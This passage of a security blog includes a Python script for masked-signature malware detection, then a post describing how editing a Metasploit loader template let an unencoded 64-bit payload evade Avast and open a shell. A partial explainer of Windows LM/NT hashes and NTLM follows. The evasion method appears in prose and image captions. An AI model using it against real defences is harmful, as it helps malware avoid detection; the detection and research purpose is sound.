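BENIGN_BLOB = bytes.fromhex("554889e5" "31c0" "5d" "c3")

# Offset of the imm32 operand inside the stub: 3 bytes of 'mov rbp,rsp' + the 0xBA opcode byte.
IMM_OFFSET = 4


def exact_match(blob: bytes, sig: bytes = ORIGINAL_STUB) -> bool:
    """Naive signature: literal substring match against one known-bad build."""
    return sig in blob


def masked_from(sample: bytes, wildcard: range) -> MaskedSig:
    """Derive a masked signature from a known sample, wildcarding one byte range."""
    return [(b, 0x00 if i in wildcard else 0xFF) for i, b in enumerate(sample)]


# Same instruction skeleton as the original build, with the 4-byte immediate wildcarded.
MASKED_SIG = masked_from(ORIGINAL_STUB, range(IMM_OFFSET, IMM_OFFSET + 4))


def masked_find(blob: bytes, sig: MaskedSig = MASKED_SIG) -> Optional[int]:
    """Return the offset of the first masked match in blob, or None if absent."""
    n = len(sig)
    for off in range(len(blob) - n + 1):
        if all((blob[off + i] & m) == (b & m) for i, (b, m) in enumerate(sig)):
            return off
    return None


def buffer_length_at(blob: bytes, off: int) -> int:
    """Decode the little-endian imm32 operand of a stub matched at offset off."""
    return int.from_bytes(blob[off + IMM_OFFSET: off + IMM_OFFSET + 4], "little")


def scan(blob: bytes) -> dict:
    """Run both signatures and report what each saw, plus the decoded buffer length."""
    off = masked_find(blob)
    return {
        "exact": exact_match(blob),
        "masked": off is not None,
        "buffer_len": buffer_length_at(blob, off) if off is not None else None,
    }


if __name__ == "__main__":
    # Embed each sample in constructed padding, as a scanner would see it inside a file.
    for name, sample in (("original", ORIGINAL_STUB),
                         ("modified", MODIFIED_STUB),
                         ("benign", BENIGN_BLOB)):
        print(name, scan(b"\x90" * 16 + sample + b"\xcc" * 16))
```

Running it shows the exact signature firing only on the original build, while the masked one fires on both and reports 4096 versus 8192 for the operand. The practical point for a detection engineer is to anchor on the opcode skeleton of the loader (the allocate-copy-execute sequence the post describes) rather than on whichever constants a given build happened to use.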
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia426" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="368.85483870967744" data-react-checksum="-1102893567" data-reactid=".j" id="innercomp_txtMedia426" style="background: transparent; border: 0px; clear: both; display: block; height: 369px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 551px;" title="">
<div class="s14link" data-reactid=".j.0" id="innercomp_txtMedia426link" style="background: transparent; border: 0px; display: block; height: 369px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 551px;">
<div class="s14img" data-reactid=".j.0.0" data-state="loaded" id="innercomp_txtMedia426img" style="background: transparent; border: 0px; height: 369px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 551px;">
<img class="s14imgimage" data-reactid=".j.0.0.0" id="innercomp_txtMedia426imgimage" src="http://static.wixstatic.com/media/75fce7_812ec95952144a02b2c070b3e1776ca6.png_srb_p_542_363_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 369px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 551px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
New assembly source code listing with 8192 buffer length.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia9r8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="132.88391640163562" data-react-checksum="1047736168" data-reactid=".k" id="innercomp_txtMedia9r8" style="background: transparent; border: 0px; clear: both; display: block; height: 133px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" title="">
<div class="s14link" data-reactid=".k.0" id="innercomp_txtMedia9r8link" style="background: transparent; border: 0px; display: block; height: 133px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 629px;">
<div class="s14img" data-reactid=".k.0.0" data-state="loaded" id="innercomp_txtMedia9r8img" style="background: transparent; border: 0px; height: 133px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 629px;">
<img class="s14imgimage" data-reactid=".k.0.0.0" id="innercomp_txtMedia9r8imgimage" src="http://static.wixstatic.com/media/75fce7_9958eadb26034a75a97d45133fe922fa.png_srb_p_629_133_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 133px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
64-bit payload using new template, and no encoding.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia8rb" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="224.56451612903226" data-react-checksum="-231657483" data-reactid=".l" id="innercomp_txtMedia8rb" style="background: transparent; border: 0px; clear: both; display: block; height: 225px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 612px;" title="">
<div class="s14link" data-reactid=".l.0" id="innercomp_txtMedia8rblink" style="background: transparent; border: 0px; display: block; height: 225px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 612px;">
<div class="s14img" data-reactid=".l.0.0" data-state="loaded" id="innercomp_txtMedia8rbimg" style="background: transparent; border: 0px; height: 225px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 612px;">
<img class="s14imgimage" data-reactid=".l.0.0.0" id="innercomp_txtMedia8rbimgimage" src="http://static.wixstatic.com/media/75fce7_d32226d9db964893b7bde2e19727e87e.png_srb_p_602_221_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 225px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 612px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
64-bit payload using new template and XOR encoding</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia1r6f" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="142.25806451612905" data-react-checksum="347353269" data-reactid=".m" id="innercomp_txtMedia1r6f" style="background: transparent; border: 0px; clear: both; display: block; height: 143px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 559px;" title="">
<div class="s14link" data-reactid=".m.0" id="innercomp_txtMedia1r6flink" style="background: transparent; border: 0px; display: block; height: 143px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 559px;">
<div class="s14img" data-reactid=".m.0.0" data-state="loaded" id="innercomp_txtMedia1r6fimg" style="background: transparent; border: 0px; height: 143px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 559px;">
<img class="s14imgimage" data-reactid=".m.0.0.0" id="innercomp_txtMedia1r6fimgimage" src="http://static.wixstatic.com/media/75fce7_15827d574e854a628d2e8cd32cf578b4.png_srb_p_550_140_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 143px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 559px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
New payloads in a directory on the Windows system!</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia11f6" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="172.74193548387098" data-react-checksum="998125665" data-reactid=".n" id="innercomp_txtMedia11f6" style="background: transparent; border: 0px; clear: both; display: block; height: 173px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 374px;" title="">
<div class="s14link" data-reactid=".n.0" id="innercomp_txtMedia11f6link" style="background: transparent; border: 0px; display: block; height: 173px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 374px;">
<div class="s14img" data-reactid=".n.0.0" data-state="loaded" id="innercomp_txtMedia11f6img" style="background: transparent; border: 0px; height: 173px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 374px;">
<img class="s14imgimage" data-reactid=".n.0.0.0" id="innercomp_txtMedia11f6imgimage" src="http://static.wixstatic.com/media/75fce7_dbe51da41bc4424aa4f18d2a217218cc.png_srb_p_368_170_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 173px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 374px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Go ahead and scan my directory...</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia18kd" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="147.33870967741933" data-react-checksum="2131636489" data-reactid=".o" id="innercomp_txtMedia18kd" style="background: transparent; border: 0px; clear: both; display: block; height: 148px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 297px;" title="">
<div class="s14link" data-reactid=".o.0" id="innercomp_txtMedia18kdlink" style="background: transparent; border: 0px; display: block; height: 148px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 297px;">
<div class="s14img" data-reactid=".o.0.0" data-state="loaded" id="innercomp_txtMedia18kdimg" style="background: transparent; border: 0px; height: 148px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 297px;">
<img class="s14imgimage" data-reactid=".o.0.0.0" id="innercomp_txtMedia18kdimgimage" src="http://static.wixstatic.com/media/75fce7_32c4b1fbf70d4e0a879412bc0b1d2466.png_srb_p_292_145_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 148px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 297px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
I am safe, what a relief!</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia11lv" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="319.06451612903226" data-react-checksum="1422209335" data-reactid=".p" id="innercomp_txtMedia11lv" style="background: transparent; border: 0px; clear: both; display: block; height: 320px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 354px;" title="">
<div class="s14link" data-reactid=".p.0" id="innercomp_txtMedia11lvlink" style="background: transparent; border: 0px; display: block; height: 320px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 354px;">
<div class="s14img" data-reactid=".p.0.0" data-state="loaded" id="innercomp_txtMedia11lvimg" style="background: transparent; border: 0px; height: 320px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 354px;">
<img class="s14imgimage" data-reactid=".p.0.0.0" id="innercomp_txtMedia11lvimgimage" src="http://static.wixstatic.com/media/75fce7_ebaa8c74b80d445cbf93755164db5a68.png_srb_p_348_314_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 320px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 354px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Oh no, I might get caught here! Phew...</div>
<div id="innerContainer_txtMediapqj" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="101.38550658791458" data-react-checksum="-2101727034" data-reactid=".q" id="innercomp_txtMediapqj" style="background: transparent; border: 0px; clear: both; display: block; height: 102px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" title="">
<div class="s14link" data-reactid=".q.0" id="innercomp_txtMediapqjlink" style="background: transparent; border: 0px; display: block; height: 102px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 629px;">
<div class="s14img" data-reactid=".q.0.0" data-state="loaded" id="innercomp_txtMediapqjimg" style="background: transparent; border: 0px; height: 102px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 629px;">
<img class="s14imgimage" data-reactid=".q.0.0.0" id="innercomp_txtMediapqjimgimage" src="http://static.wixstatic.com/media/75fce7_c40d87d751fc468b82882c4710798d8f.png_srb_p_629_102_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 102px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
And now it’s shell time.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Conclusion</span></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
My theory, borne out in practice, is that AV vendors are looking at the templates rather than the shellcode itself. In this specific instance, we saw immediate success with only a minor assembly code modification and absolutely no encoding of a 64-bit shellcode payload.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Why choose Avast? No specific reason other than I needed a solution in a hurry to execute my test. I will be repeating the experiment with other AV engines to see what my mileage looks like. There are many possible variations on this technique but like so much in life, it is better to start simple and ramp up as needed. Happy hunting!</div>
Post Exploitation, Metasploit and Windows Hashes (published 2014-10-07)<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: Verdana, sans-serif; font-size: large;">What is a
Windows hash?</span></b></h2>
<span style="font-family: Verdana, sans-serif;">A Windows hash is an unsalted, one-way hash of a
plaintext password. Windows has used two
different hashing algorithms to date, producing either a LAN Manager (LM) hash or an NT hash. In a Microsoft Windows network, NT LAN
Manager (NTLM) is a suite of protocols used to provide authentication,
integrity and confidentiality to users.
NTLM is the successor to LAN Manager (LANMAN), and attempts to provide
backwards compatibility with LANMAN.</span><br />
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In the world of cryptography, a salt is a known piece of
additional random data that is “mixed in” as an extra input to the one-way
hash function.<span style="mso-spacerun: yes;"> </span>The advantage of
salting is that the same plaintext password will not produce the same stored hash
twice, because a fresh salt is used each time.<span style="mso-spacerun: yes;">
</span>Unfortunately, this technique is not used for the hashes Windows stores.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The LANMAN hash is constructed as follows:</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">The plaintext password is converted to all uppercase and padded with NULL characters
to a length of fourteen bytes.</span></li>
<li><span style="font-family: Verdana, sans-serif;">The resulting string is split into two seven-character
strings. Each string is used as a key to encrypt the constant string value “KGS!@#$%”
with the Data Encryption Standard (DES) algorithm.</span></li>
<li><span style="font-family: Verdana, sans-serif;">The two resulting ciphertexts are
concatenated into a sixteen-byte hash value.</span></li>
</ul>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The NT hash is constructed by using the MD4 hashing algorithm
over the plaintext string. A plaintext
password, used to construct the NT hash, can be up to 256 characters in length
with mixed case and special characters.
Unlike the LM hash, special characters, upper and lower case are all
preserved with an NT hash.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: Verdana, sans-serif; font-size: large;">How is a
Windows hash passed across the network?</span></b></h2>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">From a network transmission perspective, there are two
different challenge/response algorithms in use.<span style="mso-spacerun: yes;"> </span>The LANMAN and NTLMv1 algorithms operate as
follows:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l2 level1 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">1)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Workstation client initiates authentication<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l2 level1 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">2)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Server responds with a random challenge<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l2 level1 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">3)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Client formulates and sends a response to the challenge
by:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">a)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Padding the LANMAN/NT hash to 21 bytes<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">b)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Splitting the hash into three seven character pieces<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -17.95pt;">
